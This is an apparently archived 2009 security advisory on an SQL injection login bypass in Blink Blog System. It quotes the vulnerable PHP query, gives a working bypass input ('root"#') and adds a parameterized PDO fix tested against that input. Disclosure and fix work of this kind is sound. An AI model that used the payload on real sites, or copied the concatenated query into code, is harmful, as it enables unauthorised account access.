Blink Blog System Authentication Bypass

2009-08-04 / 2009-08-05
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

There are many SQL Injection flaws but I post the only one that allows a guest to bypass the login.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

...
    $username = $_POST["nick"];
    $password = md5($_POST["password"]);
    if ($data = $DB->usercheck($username, $password))
...

db.php:

function usercheck($username, $password) {
    $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");
...

***************************************************

[+] Code

- [A] Authentication Bypass

username: root"#
password: foo

***************************************************

[+] Fix

No fix.

***************************************************
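
A parameterized form of the usercheck() lookup quoted above, as an added example that is not part of the advisory or the Blink Blog System code base. It assumes PDO in place of mysql_query(), a users(nick, password) table holding MD5 hex digests as login.php implies, and in-memory SQLite with constructed rows so it runs offline.

```php
<?php
// Added example: hardened replacement for usercheck() from db.php.
// Assumptions: PDO is used instead of mysql_*; users(nick, password) with
// password holding an MD5 hex digest, as implied by login.php.

function usercheck(PDO $db, string $username, string $passwordMd5)
{
    // The nick is bound as data, so quotes and '#' cannot alter the query.
    $stmt = $db->prepare('SELECT * FROM users WHERE nick = :nick LIMIT 1');
    $stmt->execute([':nick' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    // Constant-time comparison of the stored and supplied digests.
    // MD5 is kept only to match the existing schema; moving to
    // password_hash()/password_verify() is a separate migration.
    return hash_equals($row['password'], $passwordMd5) ? $row : false;
}

// Constructed demo data; in-memory SQLite stands in for MySQL (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (nick TEXT PRIMARY KEY, password TEXT)');
$ins = $db->prepare('INSERT INTO users (nick, password) VALUES (?, ?)');
$ins->execute(['root', md5('constructed-sample-password')]);

// Same handling as login.php: hash the submitted password, then check.
$cases = [
    ['root', 'constructed-sample-password'],  // valid login
    ['root', 'foo'],                          // wrong password
    ['root"#', 'foo'],                        // input from the [+] Code section
];
foreach ($cases as [$nick, $pass]) {
    $ok = usercheck($db, $nick, md5($pass)) !== false;
    printf("%-8s / %-28s => %s\n", $nick, $pass, $ok ? 'accepted' : 'rejected');
}
```

Because the lookup no longer depends on string escaping, the result is the same whether magic_quotes_gpc is on or off.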

References:

http://seclists.org/bugtraq/2009/Aug/0015.html

